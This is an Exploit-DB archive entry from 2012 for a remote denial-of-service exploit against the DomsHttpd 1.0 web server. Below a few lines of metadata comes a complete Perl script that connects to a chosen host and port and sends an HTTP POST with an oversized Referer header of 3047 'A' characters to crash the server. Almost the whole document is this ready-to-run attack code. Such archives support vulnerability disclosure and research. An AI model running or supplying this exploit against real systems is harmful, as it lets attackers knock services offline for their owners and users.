DomsHttpd <= 1.0 - Remote Denial of Service Exploit

2012-07-16T00:00:00
ID EDB-ID:19866
Type exploitdb
Reporter Jean Pascal Pereira
Modified 2012-07-16T00:00:00

Description

DomsHttpd <= 1.0 - Remote Denial of Service Exploit. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl

# DomsHttpd 1.0 &lt;= Remote Denial Of Service Exploit

# Credit: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;

# Usage: domshttpd.pl [host] [port]

use strict;
use warnings;
use IO::Socket;

my $host = shift || "localhost";
my $port = shift || 88;

my $sock = IO::Socket::INET-&gt;new( Proto =&gt; "tcp",
                                  PeerAddr  =&gt; $host,
                                  PeerPort  =&gt; $port
);


my $junk = "A"x3047;

print $sock "POST / HTTP/1.1\r\nHost: ".$host."\r\nConnection: close\r\nUser-Agent: Mozilla\r\nReferer: http://".$host."/".$junk."\r\n\r\n";

sleep 4;

close($sock);